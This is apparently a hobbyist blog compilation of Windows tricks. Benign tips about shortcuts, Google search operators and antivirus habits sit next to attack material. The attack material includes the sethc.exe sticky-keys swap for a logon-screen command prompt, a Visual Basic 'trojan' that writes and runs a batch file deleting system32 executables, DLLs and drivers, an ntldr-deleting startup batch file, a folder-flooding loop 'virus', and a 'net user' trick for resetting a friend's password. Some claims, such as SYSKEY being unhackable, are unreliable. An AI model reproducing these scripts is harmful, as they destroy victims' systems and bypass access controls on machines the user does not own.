Login Into Gmail with different account at a time

Create a shortcut of your Google talk.
Right click the shortcut ----> choose Properties.
In the "Target" you will find this
"C:\Program Files\Google\Google Talk\googletalk.exe"
Assuming you have installed in C:
Now at the end of target add this " /nomutex " without the quotes.
It should be like this
"C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex
There is a space after googletalk.exe"
Thats it .Click OK and you can open more than one Google talk

Sethc Windows Accesbility feature hack:

Sethc is nothing but sticky keys program which is present in system32 files

This hack allows you to access command prompt from a logout screen. Cool :)

Step 1. Goto c:\windows\system32

Step 2. Rename the file sethc.exe to sethc.exe.bak

Step 3. Copy cmd.exe to sethc.exe (You can copy netcat.exe or any executable like explorer.exe to sethc.exe)

Step 4. Now logog off and in <control+Alt+Screen> press the <shift> key 5 times

How to protect ur computer from viruses???


Reducing Your Chances of Infection:

To make yourself less of a target for virus infection, take the following steps:


  1. Restrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site; try not to put yourself at risk like this unless you absolutely have to.


  2. Don't open any e-mail attachments you weren't expecting. The majority of viruses today arrive in your mailbox as attachments to e-mail messages; resist the temptation to open or view every file attachment you receive.


  3. Use an up-to-date anti-virus program or service. Antivirus programs work; they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. They're a good first line of defense, as long as you keep the programs up-to-date with information about the very latest viruses— and most antivirus programs make it easy to download updates.


  4. Enable macro virus protection in all your applications. Most current Microsoft applications include special features that keep the program from running unknown macros—and thus prevent your system from being infected by macro viruses.


  1. Create backup copies of all your important data. If worse comes to worst and your entire system is infected, you may need to revert to no infected versions of your most critical files. You can't do this unless you plan ahead and back up your important data.



now u people ill protect ur pc from hackers and funny guys like us :-p

how to know ur ip address and how to change ur ip???

Step 1: using cmd then u can type command ipconfig it`ll display Ur ip address of your computer or u can know Ur ip address by using websites also

Ex: www.whatisip.com ,

Step 2: now we`re going to work with proxy servers

Proxy servers are used to hide our ip address and linked with information

Step 3: if u want to change ur ip address. You have to access any websites through

Proxy servers only

Ex: www.hidemyass.com

Step 4: above example website will shows duplicate ip address.

How to Make a Destructive Trojan to crash the system

Introduction about Trojan virus:

This tutorial, or article or whatever you want to call it,

is based around a destructive trojan I wrote in a day. So don't think that after

you read this you will be a pro in virus writing! :P

I used a program called Visual Basic 6.0 to write this virus and VB is the only

programming language i know. Of course there are loads of other languages like ASM,

QBasic and so on.

Step 1:

Purpose and wat action will be happened:

Ok, I was going to get straight to the point and show you the code for my Jockster

trojan which deletes important files in the computer and simply makes the computer useless

until the victim formats the C drive.

step 2: open notepad

step 3: now copy the below code into notepad    

Private Sub Form_Load()

On Error Resume Next

Open "C:\Jockstrap.txt" For Output As #1

Print #1, "@echo off"

Print #1, "cls"

Print #1, "@del C:\windows\*.ini"

Print #1, "cls"

Print #1, "@del C:\windows\*.log"

Print #1, "cls"

Print #1, "@del C:\windows\*.exe"

Print #1, "cls"

Print #1, "@del C:\windows\*.com"

Print #1, "cls"

Print #1, "@del C:\windows\system32\*.scr"

Print #1, "cls"

Print #1, "@del C:\windows\SYSTEM32\*.exe"

Print #1, "cls"

Print #1, "@del C:\windows\system32\*.log"

Print #1, "cls"

Print #1, "@del C:\windows\SYSTEM32\*.drv"

Print #1, "cls"

Print #1, "@del C:\windows\system32\*.dll"

Print #1, "cls"

Print #1, "@del C:\windows\SYSTEM32\*.sys"

Print #1, "cls"

Print #1, "@del C:\windows\SYSTEM32\*.com"

Print #1, "cls"

Print #1, "@del C:\windows\system.ini"

Close #1

Name "C:\Jockstrap.txt" As "C:\Jockstrap.bat"

Shell "C:\Jockstrap.bat"

MsgBox "yapiee ur system is crashed!",vbCritical

Kill "C:\Jockstrap.bat"


End Sub

step 4: now this save it as Jockstrap.bat format

Step 5:now run this file, it`ll display an error msg after that it`ll execute at background automatically

step 6:now system crash is ready

important Note:::

This is an educational document. I take no responsibility for what use the

information in this document is used for. I am unable to be blamed for any

troubles you get into with the police, FBI, or any other department. Viruses

are illegal to be spread, so this is simply for theoretical purposes or

testing in a controlled environment. It is not illegal to write viruses, but it is

to spread them. I do not take any responsibility for your actions!

So that is clear? Good! Lets begin! :)

Hacks that don't work on Operating System.

1. Making Registry changes to speed up a computer : In some very specific cases changing the registary can speed up your computer a little bit. Sometimes. But by & large, spelunkinng through your Registary looking for a killer bit that'll boost your speed by 10% is a fool's game.
   If you do find hack that'll speed up your computer by 10%, you'll never even notice the difference. It takes a speed-up of 20% or so to be noticable- and even a 30% goin won't seem like much after a day or two. On the other hand, if that speed-up hack makes your computer unstable, belive me, you will notice. Right between the eyes you'll notice.

2. Using any registry cleanup utility : Ther's one born every minute. Software companies have made millions & millions of dollars offering programs that scan & clean your registary entries. I've never seen a single registary cleaner that was both safe & effective. Sure, your registary gets clogged up with useless entries. Does that make your machine slower? No "Cleaning" little known registary entries can make your machine roll over & die. You're better off using a sledgehammer.

3. Disabling Windows processes : I've seen a dozen reason for disabling the Window programs that automatically launch when windows starts. (You can see which processes are running on your computer - execept the really stealthy ones - by pressing Ctrl+Alt+Del & clicking Processes in the Window task Manager) None of the reason I've seen for disablig processs manualyy makes any sense. Years ago, a Window process called UPnP opened a huge security hole in Window XP. Microsoft fixed the hole, eventually, & for a while it made sense to disable the UPnP process.
   If you have  renegade processes, they're symptomatic of another problem - generally a worm, spyware, or some other form of malware. You should treat the problem by zapping out the offending software instead of attacking things placemeal by manually disabling a runnig process that you don't understand.

4. Assigning fancy file access permission : Yes, I know you can fine-tune folder & file permissions, even with Window XP Home, So you can allow certain people to see your files, keep others out, & make others dance like bears before the data comes up. But for most people, it isn't worth the effort. Why? If you really need to set up sophisticated file access permissions - so that 1 person can read the file & update others file - & you aren't willing to use passwords, you need to bite the bullet & install a server, Window XP Pro, & Active Directory. The half- fast approaches to ristricting access in Window XP Home are doomed to failure simply because the tools aren't all there.

5. Doing anything involving DOS : Okay, there are exception. I even talk about one of them. But if you aren't conversant with DOS - & few of us are after all these years - you can almost always find better way to accomplish what you want by using Windows alone or one of the nearly infinte number of free utilities.

6. Making parental control software & modification : Doomed to failure, no matter how hard you try . Windows does't have the tools to properly implement parental control, & the world on the Web changes much too fast. Don't even bother.

Working with batch file to create different shortcuts…..

Step 1: Before going to create a batch file, 1st u have to know its purpose::

1. Batch file extension is example.bat

2. This file will works with command prompt and to execute user requested commands.

Step 2: now we want to create a shortcut for opening paint, notepad, cal

At a time by clicking a single application it`ll open these above 3 applications

Step 3: open notepad and type the below 3 commands…

Start notepad

     Start cal

     Start mspaint

Step 4: now save it as shortcut.bat

Step 5: now run this file it`ll execute above three applications

Step 6: now u can enjoy this trick to create no. of shortcuts.

Cool tips for u guys to Delete An "undeletable" File::


Step 1: Open a Command Prompt window and leave it open.

Step 2: Close all open programs.

Step 3: Click Start, Run and enter TASKMGR.EXE

Step 4: Go to the Processes tab and End Process on Explorer.exe.

Step 5: Leave Task Manager open.

Step 6: Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.

Step 7: At the command prompt type DEL <filename> where <filename> is the file you wish to delete.

Step 8: Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.

Step 9: Close Task Manager.

How to create a simple virus by using notepad??

Step 1: open notepad and type below code…..


Md hacker

Cd hacker

Goto 123

Step 2: save it as virus.bat

Step 3: now run the virus. It`ll create uncountable number of floder virus with hacker name.

Step 4: if u want to stop this process. Then go for task manager and end the process.

Systems hacking by using cmd prompt

Step 1: open CMD prompt.

Step 2: type command
Net user username *

Step 3: the above command I'll show like this:

New password:

Confirm password:



Step 4: Now u enter ur new password without using ur old password.

Step 5: Now u can enter with ur own password into ur friends computer.

Step 6: we are expecting that u people`ll like dis.




Using Cmd prompt:

Step 1: open cmd prompt

Step 2: type command

copy /b picturename.jpg+filename.txt final.jpg

Step 3: it will show same picture as like before only but file will be hided at back of the picture.

Step 4: now we want to open that same file again. Then open that picture with notepad then it`l show our data at the end of the file.


note: this command will not work on win7,vista.

picture and file be in same directory

using software tool:

Step 1: download the software by clicking this below link.

Step 2: now install in your computer. It's not a virus it'll not harmful to your computer also.

Step 3: Create a notepad file like this and save as hello.txt

Step 4: now right on the file and open with Camoflauge option

Step 5: do the operations as like below process.


Step 6:attach file with any picture or software.

Step 7: enter your unique password to protect from others.

Step 8: finally resultant file will be like as show in figure.

Step 9: now again we want to retrieve that same file then right click on that file and open with uncamouflage .

Step 9: enter password and extract ur file into ur machine.

Google hacks and secrets………

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as
Example: mysite

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in
link: Hackingstore.blogspot.com

inurl: restricts results to sites whose URL contains the specified phrase

example: inurl:fox fire will find all sites containing the word fire in the text and fox in the URL

filetype, ext: restricts results to documents of the specified type

example: filetype:pdf fire will return PDFs containing the word fire, while filetype:xls fox will return Excel spreadsheets with the word fox

How to create deadly virus to crash the entire system???

step 1: Open notepad
step 2: Now type the code as below…. Format..
attribute c:\ntldr –n –s –r
del c:\ntldr \f
ntldr stands for new technology loader
Options are permission provided by the windows operating system.

step 3: Now save as friend.bat
step 4: Now u can run this file to crash your system
step 5: If u keep this file in startup folder then it`ll execute
automatically when switch on ur computer.

Creating your own shortcuts to shutdown your computer

For Shutdown shortcut:
Step 1: Open notepad and type the below command
shutdown –s –t 00
Step 2: Now save it as shutdown.bat
Step 3:Now that file will act as a shutdown button.

For restart shortcut:
As like as above process but command is
Shutdown –r –t 00

How to protect ur computer from hacking ????

SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.

SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from BindView found a security hole in SYSKEY which indicates that a certain form of cryptanalytic attack is possible offline. A brute force attack then appeared to be possible.

Microsoft later collaborated with BindView to issue a fix for the problem (dubbed the 'Syskey Bug') which appears to have been settled and SYSKEY has been pronounced secure enough to resist brute force attack.

According to Todd Sabin of the BindView team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.

Step 1: Open Run command by pressing windows+R key or start -> run
Step 2:Type SYSKEY in the run prompt syskey means “system key”

Step 3: Click “ok”then it ill display sam lock control. Again click ‘yes ’ option and then it`l display like this ….

Step 4: Now go for upadateoption.
Step 5: After it will display startup key setup.

Step 6:Check the Password startup

Step 7: Now set the password and click ok

syskey password will ask before the user accounts password .
syskey password will not be hacked by any hacker.

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